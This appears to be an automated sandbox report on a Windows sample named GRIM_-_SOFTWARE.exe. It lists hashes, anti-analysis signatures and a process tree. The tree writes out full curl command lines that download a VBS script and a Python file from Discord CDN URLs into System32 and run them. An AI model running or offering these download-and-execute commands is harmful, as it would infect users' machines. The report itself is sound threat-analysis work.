Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-03-2023 22:51
Behavioral task: behavioral1
Sample: GRIM_-_SOFTWARE.exe
Resource: win7-20230220-en
General
Target: GRIM_-_SOFTWARE.exe
Size: 3.8MB
MD5: 6d7e1336a7185a2049c09429cc980b75
SHA1: fd2de69db4416363fb6e34b42e0510256e0e28aa
SHA256: 01324ea7cc70df8163a950920606ec33375dd911b5297bf6d204939d19a1ffcb
SHA512: 88cf6bfc2deb543e0644100c7a3d547bd18a1e05715a4554d7c45a21a608bbf8821e0427630de9298197477dd5df2317c2c5c2aa01c1cbfe3a7b5531f91547e0
SSDEEP: 98304:s/dtvQLaLimy/whXcohnwA3wPiee6R8dqFedrh1NqYQ8wUkdqz54v8mY:gdt8my/ysoBDAPiURzenxuc4k1
Malware Config
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes: GRIM_-_SOFTWARE.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | GRIM_-_SOFTWARE.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: GRIM_-_SOFTWARE.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | GRIM_-_SOFTWARE.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | GRIM_-_SOFTWARE.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | cmd.exe
Processes:
resource | yara_rule
behavioral2/memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
behavioral2/memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmp | themida
Checks whether UAC is enabled
Processes: GRIM_-_SOFTWARE.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | GRIM_-_SOFTWARE.exe
Drops file in System32 directory 3 IoCs
Processes: curl.exe, curl.exe, curl.exe
description | ioc | process
File created | C:\Windows\System32\prnmngrs.vbs | curl.exe
File created | C:\Windows\System32\IME\SHARED\IMESEARCHING.py | curl.exe
File created | C:\Windows\System32\Windows_FIEO.mp3 | curl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes: GRIM_-_SOFTWARE.exe
pid | process
3804 | GRIM_-_SOFTWARE.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 3 IoCs
Processes: cmd.exe, WScript.exe, OpenWith.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings | WScript.exe
Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings | OpenWith.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: AUDIODG.EXE
description | pid | process
Token: 33 | 5040 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 5040 | AUDIODG.EXE
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: OpenWith.exe
pid | process
404 | OpenWith.exe
Suspicious use of WriteProcessMemory 42 IoCs
Processes: GRIM_-_SOFTWARE.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
description | pid | process | target process
PID 3804 wrote to memory of 3700 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 3700 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3700 wrote to memory of 4064 | 3700 | cmd.exe | curl.exe
PID 3700 wrote to memory of 4064 | 3700 | cmd.exe | curl.exe
PID 3804 wrote to memory of 2796 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 2796 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 2796 wrote to memory of 1572 | 2796 | cmd.exe | curl.exe
PID 2796 wrote to memory of 1572 | 2796 | cmd.exe | curl.exe
PID 3804 wrote to memory of 2288 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 2288 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 2288 wrote to memory of 3600 | 2288 | cmd.exe | WScript.exe
PID 2288 wrote to memory of 3600 | 2288 | cmd.exe | WScript.exe
PID 3804 wrote to memory of 4732 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4732 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4204 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4204 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 1856 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 1856 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4636 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4636 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 4636 wrote to memory of 3316 | 4636 | cmd.exe | certutil.exe
PID 4636 wrote to memory of 3316 | 4636 | cmd.exe | certutil.exe
PID 4636 wrote to memory of 1060 | 4636 | cmd.exe | find.exe
PID 4636 wrote to memory of 1060 | 4636 | cmd.exe | find.exe
PID 4636 wrote to memory of 3988 | 4636 | cmd.exe | find.exe
PID 4636 wrote to memory of 3988 | 4636 | cmd.exe | find.exe
PID 3804 wrote to memory of 2584 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 2584 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 2584 wrote to memory of 3840 | 2584 | cmd.exe | curl.exe
PID 2584 wrote to memory of 3840 | 2584 | cmd.exe | curl.exe
PID 3804 wrote to memory of 3760 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 3760 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 396 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 396 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4508 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4508 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 1640 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 1640 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 5036 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 5036 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4680 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
PID 3804 wrote to memory of 4680 | 3804 | GRIM_-_SOFTWARE.exe | cmd.exe
Processes (indentation shows the process tree; the number in parentheses is the depth level)

C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe (1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\curl.exe (3)
      Command line: curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1083836125409447966/me.vbs --output C:/Windows/System32/prnmngrs.vbs
      - Drops file in System32 directory

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\curl.exe (3)
      Command line: curl --silent https://cdn.discordapp.com/attachments/882707027791605791/1089311596381220945/Fortnite_hack_toolv2.py --output C:/Windows/System32/IME/SHARED/IMESEARCHING.py
      - Drops file in System32 directory

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c start C:/Windows/System32/prnmngrs.vbs C:/Windows/System32/IME/SHARED/IMESEARCHING.py
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe (3)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\System32\prnmngrs.vbs" C:/Windows/System32/IME/SHARED/IMESEARCHING.py
      - Modifies registry class

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\certutil.exe (3)
      Command line: certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GRIM_-_SOFTWARE.exe" MD5

    C:\Windows\system32\find.exe (3)
      Command line: find /i /v "md5"

    C:\Windows\system32\find.exe (3)
      Command line: find /i /v "certutil"

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3 >nul 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\curl.exe (3)
      Command line: curl --silent https://cdn.discordapp.com/attachments/879759160613433367/1079159361764602037/Welcome.mp3 --output C:/Windows/System32/Windows_FIEO.mp3
      - Drops file in System32 directory

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows_FIEO.mp3

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c del C:/Windows/System32/prnmngrs.vbs

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c del C:/Windows/System32/IME/SHARED/IMESEARCHING.py

  C:\Windows\system32\cmd.exe (2)
    Command line: C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\OpenWith.exe (1)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\AUDIODG.EXE (1)
  Command line: C:\Windows\system32\AUDIODG.EXE 0x474 0x4c4
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Windows\System32\IME\SHARED\IMESEARCHING.py
  Filesize: 515KB
  MD5: 7496905a1473f87362a0b838aaae1d60
  SHA1: e08a76acae2addf87faf4999ccce642dbf903c1a
  SHA256: a02ca0d375e96b5c2c65ff510ea4139cc064d9cef37a7e6e1077ba962ee0ea8c
  SHA512: 8d18fb0e5cdbb138d97d315bd8cee9de03ec474c7d1cc426d502723edaf76b0abbd6ba2d0197255bbb13fc3834d0f62ae9f6b2b2a31176547992846f22e0bb70

C:\Windows\System32\Windows_FIEO.mp3
  Filesize: 9KB
  MD5: 7a3a54e10348afe1b57c512ad2466562
  SHA1: ec0c5a195c5b7383cb1cb2058f30f6c054f47c83
  SHA256: 74c4c6de3ef3aa22b41bd4f4f7ca88da3424306ce04f110943628e3ff624c18b
  SHA512: e822769580d34bdcedb1b92f58a6838a35debed6a0fdd389c2dfc7b461a0f5761924ddcadf776d0240831d4735404455dc534fd43b64570dfe68b590b31e2f85

C:\Windows\System32\prnmngrs.vbs
  Filesize: 74B
  MD5: 3269bd7a1b211a3c0e4ee7fa6649105a
  SHA1: b96df5fd92329ce6f7f178aaae5852b921e0ff47
  SHA256: c4831319543698126520cb5bb4a438dbca70fc2fa899151dbec613d320a50896
  SHA512: 41687e2c11c73185c0f398f6ed66466a8820d6c7b1a740ca3bbfb6cab4a059939db4f20d76d7a7fa3d943a55bd394bae61f2b72947b69995b041611245c787d4

Memory dumps (pid 3804):
  memory/3804-145-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-137-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-136-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-135-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-143-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-133-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-134-0x00007FF687160000-0x00007FF687B57000-memory.dmp  Filesize: 10.0MB
  memory/3804-147-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp  Filesize: 64KB
  memory/3804-148-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp  Filesize: 64KB
  memory/3804-149-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp  Filesize: 64KB
  memory/3804-150-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp  Filesize: 64KB
  memory/3804-151-0x00000181EE9D0000-0x00000181EE9D1000-memory.dmp  Filesize: 4KB
  memory/3804-152-0x00000181EE9C0000-0x00000181EE9D0000-memory.dmp  Filesize: 64KB